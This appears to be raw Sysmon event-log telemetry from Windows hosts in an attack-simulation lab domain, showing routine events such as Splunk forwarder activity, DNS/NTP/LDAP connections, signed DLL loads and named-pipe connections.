Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D509648F3F0955FD428C4CA7898A529F,SHA256=37A6C54EF1E213A1ABAF8D16FBF7A1A116C4185E60510821018CB82CF31CE6CDfalsefalse - insufficient disk space 23542300x80000000000000001095511Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:25.496{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5B03B4E87493E10A322597A48B40FDA0,SHA256=9BD92E5D952A7A46EEBDFBF749E6C053E95ECE247B535628591B40398021F741,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001095510Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:25.492{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095509Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:25.492{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x80000000000000001095508Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:20.043{761B69BB-818C-607D-1400-00000000BA01}1028C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudpfalsefalse127.0.0.1-62505-false127.0.0.1-53domain 354300x80000000000000001095507Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:20.043{761B69BB-819C-607D-2800-00000000BA01}2912C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-62505- 354300x80000000000000001095506Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:20.043{761B69BB-818C-607D-1400-00000000BA01}1028C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetrue7f00:1:0:0:98c0:21fe:fdb:ffff-62505-true7f00:1:0:0:0:0:0:0-53domain 354300x80000000000000001095505Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:20.018{761B69BB-819C-607D-2800-00000000BA01}2912C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-982.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-982.attackrange.local62505- 23542300x80000000000000001095504Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:25.247{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2CB60B2C95118BB76C74CFE165D7376A,SHA256=B0140A726D2D7379BA40D7E3F63EA31817CDEE12E43C66616FACD4B11B70FCAC,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001607079Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:23.722{21761711-83AE-607D-1000-00000000BB01}960C:\Windows\System32\svchost.exeNT AUTHORITY\LOCAL SERVICEudptruefalse10.0.1.15win-host-5.attackrange.local123ntpfalse13.86.101.172-123ntp 354300x80000000000000001607078Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:23.722{21761711-83AE-607D-1000-00000000BB01}960C:\Windows\System32\svchost.exeNT AUTHORITY\LOCAL SERVICEudptruefalse10.0.1.15win-host-5.attackrange.local123ntpfalse10.0.1.14-123ntp 11241100x80000000000000001607077Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:25.206{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-04-19 13:20:22.616 23542300x80000000000000001607076Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:25.206{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=95B589A522F6BE9F9367F3CEAA1F4DA4,SHA256=13D416E16D75C11584B9C3550DEB5384583BD8EB4C4153A73AC6B365D789FEB4falsefalse - insufficient disk space 11241100x80000000000000001607139Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:26.995{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001607138Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:26.995{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=931D4DEF4BCC1525E24021F2E518BF43,SHA256=74E969C783FF12C52EAB17FCFC95A13C45207EEA1A6EFBAC8896E32976575252falsefalse - insufficient disk space 23542300x80000000000000001095518Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:26.535{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A7E812A474DE37896DE7BD277B2015FE,SHA256=FD5FE02F6CB8DFA54074F3B8B5D6FB48C6D818BE18795C733D5DBBD35554C2BD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001095517Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:26.493{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095516Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:26.493{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x80000000000000001095515Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:21.071{761B69BB-818A-607D-0B00-00000000BA01}632C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-982.attackrange.local1170-true0:0:0:0:0:0:0:1win-dc-982.attackrange.local389ldap 354300x80000000000000001095514Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:21.071{761B69BB-819C-607D-2400-00000000BA01}2752C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-982.attackrange.local1170-true0:0:0:0:0:0:0:1win-dc-982.attackrange.local389ldap 354300x80000000000000001095513Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:20.775{761B69BB-818C-607D-1000-00000000BA01}100C:\Windows\System32\svchost.exeNT AUTHORITY\LOCAL SERVICEudpfalsefalse10.0.1.14win-dc-982.attackrange.local123ntpfalse10.0.1.15ip-10-0-1-15.us-west-2.compute.internal123ntp 23542300x80000000000000001095512Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:26.254{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3C2FB042923462773F646F956B74B01D,SHA256=830BDF82CA8D779D86E23849FEB75E537906565B63EDEC8DC76BAD9CA8FA1CB0,IMPHASH=00000000000000000000000000000000falsetrue 534500x80000000000000001607137Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:26.610{21761711-7ABE-6080-CA60-00000000BB01}4104C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe 734700x80000000000000001607136Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:26.610{21761711-7ABE-6080-CA60-00000000BB01}4104C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659CtrueMicrosoft WindowsValid 734700x80000000000000001607135Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:26.610{21761711-7ABE-6080-CA60-00000000BB01}4104C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\dbgcore.dll10.0.14321.1024 (debuggers(dbg).210127-1811)Windows Core Debugging HelpersMicrosoft® Windows® Operating SystemMicrosoftDBGCORE.DLLMD5=72E8FEC8419AB470FB737883463688FE,SHA256=1DA7D2D2D1C4E6EC17101A4997C4AA610818730D63C72C1D2084ABA3F25C5146trueMicrosoft WindowsValid 734700x80000000000000001607134Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:26.610{21761711-7ABE-6080-CA60-00000000BB01}4104C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\dbghelp.dll10.0.14321.1024 (rs1_release.160715-1616)Windows Image HelperMicrosoft® Windows® Operating SystemMicrosoftDBGHELP.DLLMD5=2C92DF5D32661FB4B81B08B72B2102A7,SHA256=BCEF4DEBDE7D8D6916EE3D3E5E63A725E03A058AABCD7DD49DF9D48B16E96D1AtrueMicrosoft WindowsValid 734700x80000000000000001607133Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:26.478{21761711-7ABE-6080-CA60-00000000BB01}4104C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FEtrueMicrosoft WindowsValid 734700x80000000000000001607132Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:26.478{21761711-7ABE-6080-CA60-00000000BB01}4104C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\rsaenh.dll10.0.14393.2969 (rs1_release.190503-1820)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=B6E99FD898E948657373BB02708C7C00,SHA256=90476029BD7AB0FEC53AAE567AE53BC0B09C7C5C8C7B8F19485BA872B74ED591trueMicrosoft WindowsValid 734700x80000000000000001607131Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:26.478{21761711-7ABE-6080-CA60-00000000BB01}4104C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778CtrueMicrosoft WindowsValid 18141800x80000000000000001607130Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 19:19:26.478{21761711-7ABE-6080-CA60-00000000BB01}4104\srvsvcC:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe 734700x80000000000000001607129Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:26.478{21761711-7ABE-6080-CA60-00000000BB01}4104C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\srvcli.dll10.0.14393.0 (rs1_release.160715-1616)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=656F846CAED76C6FC5C76E8BACEF4EF6,SHA256=DFDE27C086764ACC1EA3E6A4E2BA50C2AB532F9E1D99203861F51910A8D850FBtrueMicrosoft WindowsValid 18141800x80000000000000001607128Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 19:19:26.478{21761711-7ABE-6080-CA60-00000000BB01}4104\wkssvcC:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe 734700x80000000000000001607127Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:26.478{21761711-7ABE-6080-CA60-00000000BB01}4104C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\bcrypt.dll10.0.14393.4046 (rs1_release.201028-1803)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=51F4F9025E6D236F5BF2C24C09E42C8E,SHA256=AE196933C3E292680C83B09F24CE9E6D498E34ECDD30ACB8C1544EEB4705F285trueMicrosoft WindowsValid 734700x80000000000000001607126Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:26.478{21761711-7ABE-6080-CA60-00000000BB01}4104C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\wkscli.dll10.0.14393.0 (rs1_release.160715-1616)Workstation Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWKSCLI.DLLMD5=3DCBAE237E4E1F0EBE8E7DC053F778C4,SHA256=C3331CCBE71CC98A5F1BC013F1C0218FE194CA7B497DDF706BF9025AB5A7B330trueMicrosoft WindowsValid 734700x80000000000000001607125Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:26.478{21761711-7ABE-6080-CA60-00000000BB01}4104C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923trueMicrosoft WindowsValid 734700x80000000000000001607124Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:26.478{21761711-7ABE-6080-CA60-00000000BB01}4104C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\netapi32.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNetApi32.DLLMD5=F55166956AEAD05A141BA7E80B90AB7B,SHA256=B9BCF21D7F7E771C388C469B2611E8946166C62005B56D72421060DABFF7093FtrueMicrosoft WindowsValid 734700x80000000000000001607123Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:26.478{21761711-7ABE-6080-CA60-00000000BB01}4104C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\msvcp140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationmsvcp140.dllMD5=BA72C2F6F465926980ADC2FB7F8B3490,SHA256=86881A7054532019291C162F0A8177980C1C2B45490F7E88543F22915D08D9FFtrueMicrosoft CorporationValid 734700x80000000000000001607122Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:26.478{21761711-7ABE-6080-CA60-00000000BB01}4104C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5trueMicrosoft WindowsValid 734700x80000000000000001607121Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:26.478{21761711-7ABE-6080-CA60-00000000BB01}4104C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\oleaut32.dll10.0.14393.4225 (rs1_release.210127-1811)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=BB3CFF02CD7B7C5704A3E8C77DC0C199,SHA256=016E4F1366708D0F7AD7017CDFCACBDC770C972B63E579EE9A20A98CD3301931trueMicrosoft WindowsValid 734700x80000000000000001607120Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:26.478{21761711-7ABE-6080-CA60-00000000BB01}4104C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4046 (rs1_release.201028-1803)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=E92A3F429653A81E4C53A0B474A817A5,SHA256=4ECAFDB8F0F20BFFC1A5516882FD59C961DEACC2B01F669ABF1D1895F6F90A55trueMicrosoft WindowsValid 734700x80000000000000001607119Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:26.478{21761711-7ABE-6080-CA60-00000000BB01}4104C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\combase.dll10.0.14393.4350 (rs1_release.210407-2154)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=88632FDECDE467B887C3594BE2EC545C,SHA256=FFED4D80961917C785063411ED15CED1DB6588AD925E76D72E1BF684FFDBF25DtrueMicrosoft WindowsValid 734700x80000000000000001607118Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:26.478{21761711-7ABE-6080-CA60-00000000BB01}4104C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\ole32.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=676B0A1FB2A01D19AECB1F19883B6FC4,SHA256=56DEB219840DBAF9DAF645AD5D79AF9AB05F20E688382854DD487F440B257552true